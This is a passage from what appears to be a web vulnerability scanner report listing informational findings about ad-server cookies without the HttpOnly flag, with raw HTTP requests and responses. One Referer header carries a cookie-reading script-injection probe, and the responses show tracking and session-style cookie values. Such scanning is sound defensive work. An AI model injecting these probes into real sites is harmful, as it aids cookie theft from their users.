([!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#6U!!!!!#<x,:<!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#M]c!!!!$<xD>X!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#RY.!!!!$<xD>X!#SCj!!!!'<xD>X!#SCk!!!!'<xD>X!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,,!!!!#<xE(*!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#VEP!!!!#<wleE!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#ZBw!!!!$<xD>X!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]=P!!!!$<xD>X!#]@s!!!!%<whqH!#]W%!!!!$<xD>X!#]Zk!!!!#<x(sV!#^@9!!!!#<x2wq!#^Bo!!!!$<xD>X!#^bt!!!!$<xD>X!#^d6!!!!#<w<@B!#_0B!!!!#<xE(*!#`S2!!!!'<xG3/!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!'<xD>X!#aH+!!!!#<xE(*!#b.n!!!!#<xE(*!#b:Z!!!!#<x2wq!#b<Z!!!!#<x3.t!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b<m!!!!#<x3.t!#b='!!!!#<x3.t!#b=(!!!!#<x,:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b=G!!!!#<x3.t!#b?y!!!!#<xE(*!#b@%!!!!#<wsXA!#c%+!!!!#<xE(*!#c-u!!!!-<w*F]!#e(g!!!!#<xE(*!#e`Y!!!!$<xD>X!#eaO!!!!'<xD>X!#ec)!!!!%<x+rF!#g,F!!!!$<xD>X!#gHm!!!!$<xD>X!#g[h!!!!$<xD>X!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#l*=!!!!$<xD>X!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p#H!!!!$<xD>X!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#uE=!!!!#<x9#K!#uJY!!!!)<wYiT!#ust!!!!'<xD>X!#usu!!!!'<xD>X!#v,Y!!!!#<x2wq!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!'<xD>X!#wnK!!!!$<xD>X!#wnM!!!!$<xD>X!#xI*!!!!'<xD>X!#xIF!!!!%<wYiT!#xPu!!!!%<x+rT!#yM#!!!!'<xD>X!#yX.!!!!9<w*F[!$!:w!!!!#<x2wq!$!>x!!!!*<wjBg!$#3q!!!!(<x+Z1!$#WA!!!!'<xD>X!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!'<xD>X!$%,J!!!!#<x2wq!$%SB!!!!'<xD>X!$%Uy!!!!#<w>/l!$%c]!!!!$<xD>X!$'/1!!!!#<wx=%!$(!P!!!!%<xG3/!$(+N!!!!#<wGkB!$(>p!!!!$<xD>X!$(Gt!!!!%<wYiT!$(Qs!!!!$<xD>X!$)DI!!!!#<x2wq!$*Q<!!!!$<xD>X!$*R!!!!!$<xD>X"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 302 Found
Date: Sat, 30 Apr 2011 15:08:24 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!$8!!!?H!!!!%<wR0_!!-?2!!!!#<xG3/!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!#<xG3/!!0P,!!!!#<x4hf!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!'<xG3/!!PL`!!!!#<x@jG!!RZ(!!!!$<xD>X!!VQ(!!!!#<wYkr!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!$<xG3/!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!'<xD>X!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(V!!!!#<x31-!#5(W!!!!#<x3.t!#5([!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#6U!!!!!#<x,:<!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#Dri!!!!#<xYi<!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#M]c!!!!$<xD>X!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#RY.!!!!$<xD>X!#SCj!!!!'<xD>X!#SCk!!!!'<xD>X!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,,!!!!#<xE(*!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#VEP!!!!#<wleE!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#ZBw!!!!$<xD>X!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]=P!!!!$<xD>X!#]@s!!!!%<whqH!#]W%!!!!$<xD>X!#]Zk~~!#^@9!!!!#<x2wq!#^Bo!!!!$<xD>X!#^bt!!!!$<xD>X!#^d6!!!!#<w<@B!#_0B!!!!#<xE(*!#`S2!!!!'<xG3/!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!'<xD>X!#aH+!!!!#<xE(*!#b.n!!!!#<xE(*!#b:Z!!!!#<x2wq!#b<Z!!!!#<x3.t!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b<m!!!!#<x3.t!#b='!!!!#<x3.t!#b=(!!!!#<x,:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b=G!!!!#<x3.t!#b?y!!!!#<xE(*!#b@%!!!!#<wsXA!#c%+!!!!#<xE(*!#c-u!!!!-<w*F]!#e(g!!!!#<xE(*!#e`Y!!!!$<xD>X!#eaO!!!!'<xD>X!#ec)!!!!%<x+rF!#g,F!!!!$<xD>X!#gHm!!!!$<xD>X!#g[h!!!!$<xD>X!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#l*=!!!!$<xD>X!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p#H!!!!$<xD>X!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#uE=!!!!#<x9#K!#uJY!!!!)<wYiT!#ust!!!!'<xD>X!#usu!!!!'<xD>X!#v,Y!!!!#<x2wq!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!'<xD>X!#wnK!!!!$<xD>X!#wnM!!!!$<xD>X!#xI*!!!!'<xD>X!#xIF!!!!%<wYiT!#xPu!!!!%<x+rT!#yM#!!!!'<xD>X!#yX.!!!!9<w*F[!$!:w!!!!#<x2wq!$!>x!!!!*<wjBg!$#3q!!!!(<x+Z1!$#WA!!!!'<xD>X!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!'<xD>X!$%,J!!!!#<x2wq!$%SB!!!!'<xD>X!$%Uy!!!!#<w>/l!$%c]!!!!$<xD>X!$'/1!!!!#<wx=%!$(!P!!!!%<xG3/!$(+N!!!!#<wGkB!$(>p!!!!$<xD>X!$(Gt!!!!%<wYiT!$(Qs!!!!$<xD>X!$)DI!!!!#<x2wq!$*Q<!!!!$<xD>X!$*R!!!!!$<xD>X"; path=/; expires=Mon, 29-Apr-2013 15:08:24 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://www.googleadservices.com/pagead/conversion/1042374340/?label=KMciCK696gEQxL2F8QM&amp;guid=ON&amp;script=0
Cache-Control: no-store
Last-Modified: Sat, 30 Apr 2011 15:08:24 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close


14.256. http://ad.yieldmanager.com/unpixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /unpixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /unpixel?id=961699&id=1050693&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.in.gov/dwd/WorkOne//?513f2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; bh="b!!!$:!!!?H!!!!%<wR0_!!-?2!!!!#<xG3/!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!#<xG3/!!0P,!!!!#<x4hf!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!'<xG3/!!PL`!!!!#<x@jG!!RZ(!!!!$<xD>X!!VQ(!!!!#<wYkr!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!$<xG3/!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!'<xD>X!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(V!!!!#<x31-!#5(W!!!!#<x3.t!#5([!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#6U!!!!!#<x,:<!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#M]c!!!!$<xD>X!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#RY.!!!!$<xD>X!#SCj!!!!'<xD>X!#SCk!!!!'<xD>X!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,,!!!!#<xE(*!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#VEP!!!!#<wleE!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#ZBw!!!!$<xD>X!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]=P!!!!$<xD>X!#]@s!!!!%<whqH!#]W%!!!!$<xD>X!#^@9!!!!#<x2wq!#^Bo!!!!$<xD>X!#^bt!!!!$<xD>X!#^d6!!!!#<w<@B!#_0B!!!!#<xE(*!#`S2!!!!'<xG3/!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!'<xD>X!#aH+!!!!#<xE(*!#b.n!!!!#<xE(*!#b:Z!!!!#<x2wq!#b<Z!!!!#<x3.t!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b<m!!!!#<x3.t!#b='!!!!#<x3.t!#b=(!!!!#<x,:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b=G!!!!#<x3.t!#b?y!!!!#<xE(*!#b@%!!!!#<wsXA!#c%+!!!!#<xE(*!#c-u!!!!-<w*F]!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e`Y!!!!$<xD>X!#eaO!!!!'<xD>X!#ec)!!!!%<x+rF!#g,F!!!!$<xD>X!#gHm!!!!$<xD>X!#g[h!!!!$<xD>X!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#l*=!!!!$<xD>X!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p#H!!!!$<xD>X!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#uE=!!!!#<x9#K!#uJY!!!!)<wYiT!#ust!!!!'<xD>X!#usu!!!!'<xD>X!#v,Y!!!!#<x2wq!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!'<xD>X!#wnK!!!!$<xD>X!#wnM!!!!$<xD>X!#xI*!!!!'<xD>X!#xIF!!!!%<wYiT!#xPu!!!!%<x+rT!#yM#!!!!'<xD>X!#yX.!!!!9<w*F[!$!:w!!!!#<x2wq!$!>x!!!!*<wjBg!$#3q!!!!(<x+Z1!$#WA!!!!'<xD>X!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!'<xD>X!$%,J!!!!#<x2wq!$%SB!!!!'<xD>X!$%Uy!!!!#<w>/l!$%c]!!!!$<xD>X!$'/1!!!!#<wx=%!$(!P!!!!%<xG3/!$(+N!!!!#<wGkB!$(>p!!!!$<xD>X!$(Gt!!!!%<wYiT!$(Qs!!!!$<xD>X!$)DI!!!!#<x2wq!$*Q<!!!!$<xD>X!$*R!!!!!$<xD>X"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:21:00 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!$:!!!?H!!!!%<wR0_!!-?2!!!!#<xG3/!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!#<xG3/!!0P,!!!!#<x4hf!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!'<xG3/!!PL`!!!!#<x@jG!!RZ(!!!!$<xD>X!!VQ(!!!!#<wYkr!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!$<xG3/!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!'<xD>X!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(V!!!!#<x31-!#5(W!!!!#<x3.t!#5([!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#6U!!!!!#<x,:<!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#M]c!!!!$<xD>X!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#RY.!!!!$<xD>X!#SCj!!!!'<xD>X!#SCk!!!!'<xD>X!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,,~~!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#VEP!!!!#<wleE!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#ZBw!!!!$<xD>X!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]=P!!!!$<xD>X!#]@s!!!!%<whqH!#]W%!!!!$<xD>X!#^@9!!!!#<x2wq!#^Bo!!!!$<xD>X!#^bt!!!!$<xD>X!#^d6!!!!#<w<@B!#_0B!!!!#<xE(*!#`S2!!!!'<xG3/!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!'<xD>X!#aH+~~!#b.n!!!!#<xE(*!#b:Z!!!!#<x2wq!#b<Z!!!!#<x3.t!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b<m!!!!#<x3.t!#b='!!!!#<x3.t!#b=(!!!!#<x,:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b=G!!!!#<x3.t!#b?y!!!!#<xE(*!#b@%!!!!#<wsXA!#c%+!!!!#<xE(*!#c-u!!!!-<w*F]!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e`Y!!!!$<xD>X!#eaO!!!!'<xD>X!#ec)!!!!%<x+rF!#g,F!!!!$<xD>X!#gHm!!!!$<xD>X!#g[h!!!!$<xD>X!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#l*=!!!!$<xD>X!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p#H!!!!$<xD>X!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#uE=!!!!#<x9#K!#uJY!!!!)<wYiT!#ust!!!!'<xD>X!#usu!!!!'<xD>X!#v,Y!!!!#<x2wq!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!'<xD>X!#wnK!!!!$<xD>X!#wnM!!!!$<xD>X!#xI*!!!!'<xD>X!#xIF!!!!%<wYiT!#xPu!!!!%<x+rT!#yM#!!!!'<xD>X!#yX.!!!!9<w*F[!$!:w!!!!#<x2wq!$!>x!!!!*<wjBg!$#3q!!!!(<x+Z1!$#WA!!!!'<xD>X!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!'<xD>X!$%,J!!!!#<x2wq!$%SB!!!!'<xD>X!$%Uy!!!!#<w>/l!$%c]!!!!$<xD>X!$'/1!!!!#<wx=%!$(!P!!!!%<xG3/!$(+N!!!!#<wGkB!$(>p!!!!$<xD>X!$(Gt!!!!%<wYiT!$(Qs!!!!$<xD>X!$)DI!!!!#<x2wq!$*Q<!!!!$<xD>X!$*R!!!!!$<xD>X"; path=/; expires=Mon, 29-Apr-2013 22:21:00 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sat, 30 Apr 2011 22:21:00 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

14.257. http://ads.adbrite.com/adserver/vdi/711384  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/711384?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=0.2983929158654064 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; ut="1%3AHYxBDoMgEAD%2FsmcOLiht%2FI0oRtPNWsCWoOvfJV5nJnPCX0N%2FwseXvMUpQQ8hmCMLhreJJFqwU0mniILfMjPLIIj7oRJ5olq5PW%2FyEuuMGheya7EtVzw1v2qlAQVuYPZxfd5wXTc%3D"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 30 Apr 2011 15:08:25 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Sun, 01-May-2011 15:08:25 GMT
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBir0eyREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Fri, 29-Jul-2011 15:08:25 GMT
Set-Cookie: ut="1%3AHcxBDoMgEEDRu8yahQNKG28jitF0MhawJeh4d4nb95N%2Fwl9Df8LHl7zFKUEPSaeIgt8yM8sgiPuhQjBHFgxvE0m0YKcSeaIqbs%2BbvMQ6o8aF7Fpsy5Wn5lerNKDADcw%2Brs8brusG"; path=/; domain=.adbrite.com; expires=Tue, 27-Apr-2021 15:08:25 GMT
Set-Cookie: vsd=0@1@4dbc25e9@www.kodakgallery.com; path=/; domain=.adbrite.com; expires=Mon, 02-May-2011 15:08:25 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Fri, 29-Jul-2011 15:08:25 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

14.258. https://adwords.google.com/um/StartNewLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: AdsUserLocale=en; Path=/; Secure
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: S=adwords-usermgmt=d2NTU6eMWipPO3ggNY4SrA; Domain=.google.com; Path=/; Secure; HttpOnly
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 15
Content-Type: text/html; charset=UTF-8
Date: Sat, 30 Apr 2011 12:18:53 GMT
Expires: Sat, 30 Apr 2011 12:18:53 GMT
Cache-Control: private, max-age=0
